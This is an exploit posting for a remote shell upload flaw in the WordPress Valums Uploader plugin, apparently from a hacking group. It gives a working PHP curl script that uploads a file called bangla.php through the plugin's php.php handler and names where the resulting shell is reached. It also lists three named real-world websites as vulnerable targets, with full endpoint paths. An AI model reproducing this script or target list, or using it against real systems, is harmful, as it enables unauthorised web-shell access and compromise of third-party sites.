WordPress Valums Uploader Shell Upload

[DarkLegion]

The WordPress Valums Uploader plugin suffers from a remote shell upload vulnerability. Note that this finding houses site-specific data.

# Exploit Title: Wordpress Valums Uploader Shell Upload Exploit
# Date: 4-1-2013
# Author: JingoBD
# Tested on: Windows 7 And Ubuntu
# Team: BANGLADESH CYBER ARMY
# Greetz: ManInDark,Rex0Man,Evil AXE,Bedu33n,NEEL,AXIOM, And All Of My BCA Friends. They Rockz. 
          ALSO ALL BANGLADESHI Hacker Team..  

=================== EXPLOIT====================
<?php

$uploadfile="bangla.php"; 
$ch =
curl_init("http://localhost/wordpress/VALUMS_UPLOADER_PATH/php.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access: http://localhost/wp-content/uploads/2013/01/bangla.php


Some Vulnerable Sites: 
  http://www.mmodels.ca/wp/wp-content/themes/lightspeed/framework/_scripts/valums_uploader/php.php
  http://www.yellowfly.co.uk/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php
  http://www3.mhcable.com/v2/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.phps

=========================END======================

Thanks
http://facebook.com/bdcyberarmy

sursa